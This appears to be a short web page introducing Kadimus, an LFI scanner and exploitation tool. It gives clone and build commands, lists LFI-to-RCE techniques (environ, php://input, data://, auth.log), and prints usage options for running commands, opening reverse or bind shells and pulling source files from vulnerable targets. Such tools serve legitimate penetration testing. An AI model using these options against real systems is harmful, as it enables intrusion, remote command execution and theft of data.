Kadimus is an LFI scanner and exploitation tool for Local File Inclusion vulnerability detection and intrusion.
Installation
1 2 |
$git clone https://github.com/P0cL4bs/Kadimus.git $ cd Kadimus |
Then you can run the configure file:
1 |
./configure |
Then:
1 |
$ make |
Features
- Check all url parameters
- /var/log/auth.log RCE
- /proc/self/environ RCE
- php://input RCE
- data://text RCE
- Source code disclosure
- Multi thread scanner
- Command shell interface through HTTP Request
- Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
- Proxy socks5 support for bind connections
Usage
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
-h, --help Display this help menu Request: -B, --cookie STRING Set custom HTTP Cookie header -A, --user-agent STRING User-Agent to send to server --connect-timeout SECONDS Maximum time allowed for connection --retry-times NUMBER number of times to retry if connection fails --proxy STRING Proxy to connect, syntax: protocol://hostname:port Scanner: -u, --url STRING Single URI to scan -U, --url-list FILE File contains URIs to scan -o, --output FILE File to save output results --threads NUMBER Number of threads (2..1000) Explotation: -t, --target STRING Vulnerable Target to exploit --injec-at STRING Parameter name to inject exploit (only need with RCE data and source disclosure) RCE: -X, --rce-technique=TECH LFI to RCE technique to use -C, --code STRING Custom PHP code to execute, with php brackets -c, --cmd STRING Execute system command on vulnerable target system -s, --shell Simple command shell interface through HTTP Request -r, --reverse-shell Try spawn a reverse shell connection. -l, --listen NUMBER port to listen -b, --bind-shell Try connect to a bind-shell -i, --connect-to STRING Ip/Hostname to connect -p, --port NUMBER Port number to connect --b-proxy STRING IP/Hostname of socks5 proxy --b-port NUMBER Port number of socks5 proxy --ssh-port NUMBER Set the SSH Port to try inject command (Default: 22) --ssh-target STRING Set the SSH Host RCE Available techniques environ Try run PHP Code using /proc/self/environ input Try run PHP Code using php://input auth Try run PHP Code using /var/log/auth.log data Try run PHP Code using data://text Source Disclosure: -G, --get-source Try get the source files using filter:// -f, --filename STRING Set filename to grab source [REQUIRED] -O FILE Set output file (Default: stdout) |
You can download Kadimus here:
Or read more here.